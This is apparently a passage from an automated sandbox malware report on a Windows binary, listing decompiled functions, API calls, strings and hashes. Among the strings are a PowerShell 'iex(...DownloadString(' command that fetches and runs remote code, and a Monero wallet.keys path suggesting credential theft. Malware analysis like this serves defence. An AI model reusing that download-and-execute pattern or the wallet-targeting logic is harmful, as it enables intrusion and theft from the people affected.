                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: a48ca140795fc184586abaaf61e931adf379ccaeef0a2a13a97f81f96cbb6441
                                • Instruction ID: a8d2074dde2e42a619b8916c7a6770372c9051961d585c30beabc09be202d3c3
                                • Opcode Fuzzy Hash: a48ca140795fc184586abaaf61e931adf379ccaeef0a2a13a97f81f96cbb6441
                                • Instruction Fuzzy Hash: 6F212A7190022CABEB24DB54DC85FE9B7B8FB48701F00C5D8E649A6280DF756A85CFD4
                                Function 00507690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005076A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005076AB
                                • RegOpenKeyExA.ADVAPI32(80000002,012CB738,00000000,00020119,00000000), ref: 005076DD
                                • RegQueryValueExA.ADVAPI32(00000000,012DD830,00000000,00000000,?,000000FF), ref: 005076FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00507708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: ccbc9e0320f5f9ea425136dffc4a0e1f5f5271ae1a030f69f62fb29b4ce00a55
                                • Instruction ID: 542751fffaa7098881bd52a18bcbbdeda1cef132fe4fd5d614c4f7b812dfaeef
                                • Opcode Fuzzy Hash: ccbc9e0320f5f9ea425136dffc4a0e1f5f5271ae1a030f69f62fb29b4ce00a55
                                • Instruction Fuzzy Hash: 800162B5A04308BBFB00DBE4DC4EFADBBB8EB48702F108458FA45D72D0D679A9448B55
                                Function 00507720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0050773B
                                • RegOpenKeyExA.ADVAPI32(80000002,012CB738,00000000,00020119,005076B9), ref: 0050775B
                                • RegQueryValueExA.ADVAPI32(005076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0050777A
                                • RegCloseKey.ADVAPI32(005076B9), ref: 00507784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: bb6147bc456d435e74eca7d3916afac2834369bd917e5d78535e3b3565ed4244
                                • Instruction ID: 5e24f252165491d01a4b146547cfe97effd9b0dab34a75f9e2655c16ab56e2d8
                                • Opcode Fuzzy Hash: bb6147bc456d435e74eca7d3916afac2834369bd917e5d78535e3b3565ed4244
                                • Instruction Fuzzy Hash: CB0167B5A40308BBEB00DBE0DC4AFAEB7B8FB48701F008558FA45A7281D67465408B55
                                Function 005092E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(:P,80000000,00000003,00000000,00000003,00000080,00000000,?,00503AEE,?), ref: 005092FC
                                • GetFileSizeEx.KERNEL32(000000FF,:P), ref: 00509319
                                • CloseHandle.KERNEL32(000000FF), ref: 00509327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :P$:P
                                • API String ID: 1378416451-3735559389
                                • Opcode ID: 0641e2be534480ef8beb32e2c67ba189c40cb593acfa152deb038a40203f88b7
                                • Instruction ID: 69351ad83931a66b1d25cadfd91bc840e5787cedffb9752c8c3d8ca6ca332e5d
                                • Opcode Fuzzy Hash: 0641e2be534480ef8beb32e2c67ba189c40cb593acfa152deb038a40203f88b7
                                • Instruction Fuzzy Hash: 19F04F75E44208BBEB10DFB4DC4AF9E7BB9FB48711F10CA54BA51A72C4D674A6018F44
                                Function 005040B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 005040D5
                                • RegOpenKeyExA.ADVAPI32(80000001,012DD618,00000000,00020119,?), ref: 005040F4
                                • RegQueryValueExA.ADVAPI32(?,012DDD88,00000000,00000000,00000000,000000FF), ref: 00504118
                                • RegCloseKey.ADVAPI32(?), ref: 00504122
                                • lstrcat.KERNEL32(?,00000000), ref: 00504147
                                • lstrcat.KERNEL32(?,012DDBF0), ref: 0050415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: 35c830a17d2669b93c5d5301af7ddda61a36ad9217097052a373fbdaa4745c47
                                • Instruction ID: 2b7f16e2c7d4e2530c5f70d4aeaa5a2aa6d0f668a6f7938bcffce250bb48cf23
                                • Opcode Fuzzy Hash: 35c830a17d2669b93c5d5301af7ddda61a36ad9217097052a373fbdaa4745c47
                                • Instruction Fuzzy Hash: 614187B6900108BBDB14EBA0DC4BFFE773DBB88300F40855DB75556191EA799B888B92
                                Function 004F99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                • LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: cb75a940647557fc43dff5cd3f2c7c3e45e1bbc9246ab60b7a5ccdbc945ee0c0
                                • Instruction ID: b045629d737e85f6edd6e38dc4e54b07c35c7e5173d08a52f7277037c5daa2ac
                                • Opcode Fuzzy Hash: cb75a940647557fc43dff5cd3f2c7c3e45e1bbc9246ab60b7a5ccdbc945ee0c0
                                • Instruction Fuzzy Hash: 5031D3B4E00209EFDB14CF94C986BAE77B5BF48341F108159E911A7390D779AA41CFA6
                                Function 0050C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: bfc781a08eef358cdea8550022e732696b2f501931a26b78e21fcfc2ec218076
                                • Instruction ID: 8dba3c01117ef544ca6ba1463886a169f3f1ec1c5463d46a806a4f60832cafa5
                                • Opcode Fuzzy Hash: bfc781a08eef358cdea8550022e732696b2f501931a26b78e21fcfc2ec218076
                                • Instruction Fuzzy Hash: 7841E4B110079C5EDB218B248D84BFFBFE8AF46704F1449E8E98A861C2D271AA448F64
                                Function 00504780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,012DDCE0), ref: 005047DB
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504801
                                • lstrcat.KERNEL32(?,?), ref: 00504820
                                • lstrcat.KERNEL32(?,?), ref: 00504834
                                • lstrcat.KERNEL32(?,012CAE88), ref: 00504847
                                • lstrcat.KERNEL32(?,?), ref: 0050485B
                                • lstrcat.KERNEL32(?,012DD538), ref: 0050486F
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508D90: GetFileAttributesA.KERNEL32(00000000,?,004F1B54,?,?,0051564C,?,?,00510E1F), ref: 00508D9F
                                  • Part of subcall function 00504570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00504580
                                  • Part of subcall function 00504570: RtlAllocateHeap.NTDLL(00000000), ref: 00504587
                                  • Part of subcall function 00504570: wsprintfA.USER32 ref: 005045A6
                                  • Part of subcall function 00504570: FindFirstFileA.KERNEL32(?,?), ref: 005045BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 180311d333a7f3927bb327ea0024f666143b46b096d912a9aabe600746134678
                                • Instruction ID: aaf25c2f52dfabe06995324aeb26521d4b5c303aaeff5d55d5078cf93b485cd0
                                • Opcode Fuzzy Hash: 180311d333a7f3927bb327ea0024f666143b46b096d912a9aabe600746134678
                                • Instruction Fuzzy Hash: 643152B2900208A7DB11FBB0DC8AEED777CBB98700F404989B79596091EE74D6898B95
                                Function 00502C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00502D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00502CC4
                                • ')", xrefs: 00502CB3
                                • <, xrefs: 00502D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00502D04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 8022f7195e1371615938293f169d32a9aeff668ed4a519b6ed2fc2b48c66f659
                                • Instruction ID: f78273f8ecfcd4313438c4b49f70407fb7e08c2112237fca13dda14eb0f2306c
                                • Opcode Fuzzy Hash: 8022f7195e1371615938293f169d32a9aeff668ed4a519b6ed2fc2b48c66f659
                                • Instruction Fuzzy Hash: C041AD719102099AEB14EBA0C89AFEDBF78BF54300F408519F516AA1D1DF746A8ACF91
                                Function 004F9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004F9F41
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 8ec11bb8a1572481500279c24468443ce5f1e490da6f863dff29d757855dbdf2
                                • Instruction ID: df6d2e65b0be1e8340a5f761ebe1ec8969e45cbfb3d827c88bb3a7bb6000e5b2
                                • Opcode Fuzzy Hash: 8ec11bb8a1572481500279c24468443ce5f1e490da6f863dff29d757855dbdf2
                                • Instruction Fuzzy Hash: 8E610C71A1024CEFDB14EFA4DC96FED7B75BF84304F008118EA0A5B291EB746A46CB56
                                Function 005070D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • memset.MSVCRT ref: 0050716A
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0050718C
                                • sP, xrefs: 005072AE, 00507179, 0050717C
                                • sP, xrefs: 00507111
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
